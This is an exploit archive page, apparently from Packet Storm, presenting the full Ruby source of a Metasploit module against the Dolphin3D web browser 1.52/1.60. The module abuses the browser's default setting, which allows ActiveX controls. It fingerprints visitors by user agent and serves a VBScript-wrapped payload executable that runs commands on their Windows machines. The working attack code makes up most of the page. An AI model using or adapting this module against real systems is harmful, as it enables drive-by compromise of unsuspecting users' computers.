exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dolphin3D 1.52 / 1.60 Command Execution

Dolphin3D 1.52 / 1.60 Command Execution
Posted Dec 9, 2012
Authored by Rh0 | Site metasploit.com

This Metasploit module exploits the default security setting in the Dolphin3D web browser. The default security setting ("cautious") allows arbitrary ActiveX Controls, thus remote command execution.

tags | exploit, remote, web, arbitrary, activex
SHA-256 | 356432cc5a9b8dbe3b7cd92ed21f0924cd81ae63cc754755cb391a791fa19e5b

Dolphin3D 1.52 / 1.60 Command Execution

Change Mirror Download
##
#
# Dolphin3D web browser ActiveX Remote Command Execution
#
# Date: Dez 9 2012
# Author: Rh0
# Affected Version: Dolphin3D 1.52 and 1.60
# Tested on: Windows XP Professional SP3 EN
#
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Dolphin3D web browser ActiveX Exec',
'Description' => %q{
This module exploits the default security setting in the
Dolphin3D web browser. The default security setting ("cautious")
allows arbitrary ActiveX Controls, thus remote command execution.
},
## NOTE: There exists a higher security setting called "jungle-safe".
## It disables javascript/vbscript completely, which is the
## the only measure to forbit unsafe ActiveX Objects.
## bug vs. feature :) see: http://www.dolphin3d.com/safest.html
'Author' =>
[
'Rh0 <rh0[at]z1p.biz>', # discovery and metasploit module
],
'Targets' =>
[
[ 'Windows - Dolphin3D Browser 1.52 and 1.60',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
],
'DefaultTarget' => 0,
'Platform' => ['win'],
'DisclosureDate' => "Dez 9 2012"
))
end

def on_request_uri(cli,request)
agent = request.headers['USER-AGENT']
if request.uri =~ /\.ico/
print_status("Ignoring request for #{request.uri}")
send_not_found(cli)
## dolphin user agent ends with "Avant Browser)"
## could conflict with Avant Browser, see
## http://www.useragentstring.com/_uas_Avant%20Browser_version_.php)
elsif agent =~ /Avant Browser\)$/
print_status("Sending vbs payload")
send_response(cli,exe_script,{"Content-Type" => "text/html"})
else
print_status("Ignoring request from #{agent}")
send_not_found(cli)
end
end

def exe_script()
exe = generate_payload_exe()
vbs = Msf::Util::EXE.to_exe_vbs(exe)
#vbs = 'CreateObject("wscript.shell").run"calc",1,false' # PoC
return "<script language=vbscript>#{vbs}</script>"

end
end

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close